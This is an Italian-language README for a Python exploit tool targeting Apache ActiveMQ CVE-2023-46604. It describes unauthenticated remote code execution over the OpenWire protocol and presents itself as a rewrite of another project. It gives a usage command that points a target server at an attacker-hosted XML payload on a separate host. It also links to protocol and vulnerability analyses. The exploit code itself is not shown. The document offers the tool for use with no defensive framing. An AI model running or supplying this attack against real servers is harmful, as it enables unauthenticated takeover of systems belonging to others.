
Exploit di esecuzione remota di codice basato su Python per Apache ActiveMQ CVE-2023-46604, che sfrutta il protocollo OpenWire per consegnare payload XML per RCE non autenticata.
Questo progetto è una riscrittura in Python dell'exploit del progetto https://github.com/X1r0z/ActiveMQ-RCE.
python attack.py -u 192.168.163.129 -x http://192.168.163.133:10001/poc.xml -p 61616
Il parametro -p è predefinito sulla porta predefinita di ActiveMQ. Per il parametro -x, assicurati di includere il prefisso del protocollo.
Qui di seguito è riportato il diagramma del protocollo openwire per chiarezza.
Di seguito viene fornito il formato del pacchetto dati di tipo Throwable.

Per l'analisi dettagliata della vulnerabilità, consulta gli articoli di riferimento qui sotto.
# Analisi del protocollo OpenWire
https://github.com/X1r0z
https://activemq.apache.org/openwire-version-2-specification
# Analisi del principio della vulnerabilità CVE
https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/